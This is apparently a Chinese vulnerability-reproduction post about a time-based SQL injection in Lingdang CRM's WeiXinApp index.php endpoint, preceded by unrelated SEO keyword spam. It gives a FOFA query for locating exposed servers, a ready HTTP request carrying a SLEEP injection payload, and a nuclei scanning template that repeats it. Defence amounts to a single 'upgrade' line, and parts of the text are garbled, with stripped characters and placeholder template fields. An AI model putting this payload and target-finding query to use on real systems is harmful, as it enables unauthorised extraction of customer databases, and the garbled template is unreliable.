wordpress网站推翻重建,收费网站必须备案吗,张家界网站,软件公司文章目录 免责申明漏洞描述搜索语法漏洞复现nuclei修复建议 免责申明
本文章仅供学习与交流#xff0c;请勿用于非法用途#xff0c;均由使用者本人负责#xff0c;文章作者不为此承担任何责任
漏洞描述
灵当CRM系统是一款功能全面、易于使用的客户关系管理#xff08;C… 文章目录 免责申明漏洞描述搜索语法漏洞复现nuclei修复建议 免责申明
本文章仅供学习与交流请勿用于非法用途均由使用者本人负责文章作者不为此承担任何责任
漏洞描述
灵当CRM系统是一款功能全面、易于使用的客户关系管理CRM软件由上海灵当信息科技有限公司开发。该系统专为以销售和服务业务为主的中小型企业设计旨在帮助这些企业实现销售、服务、财务等一体化管理提升整体运营效率在index.php接口存在sql注入漏洞通过延时注入可以获取数据库的数据
搜索语法
fofa
bodycrmcommon/js/jquery/jquery-1.10.1.min.js漏洞复现 payload
GET /crm/WeiXinApp/marketing/index.php?moduleWxOrderactiongetOrderListcrm_user_id1%20AND%20(SELECT%209552%20FROM%20(SELECT(SLEEP(2)))x) HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36 nuclei
id: template-idinfo:name: Template Nameauthor: 30842severity: infodescription: descriptionreference:- https://tags: tagshttp:- raw:- |GET /crm/WeiXinApp/marketing/index.php?moduleWxOrderactiongetOrderListcrm_user_id1%20AND%20(SELECT%209552%20FROM%20(SELECT(SLEEP(2)))x) HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36matchers-condition: andmatchers:- type: wordpart: bodywords:- code- type: statusstatus:- 200修复建议
升级到最新版本
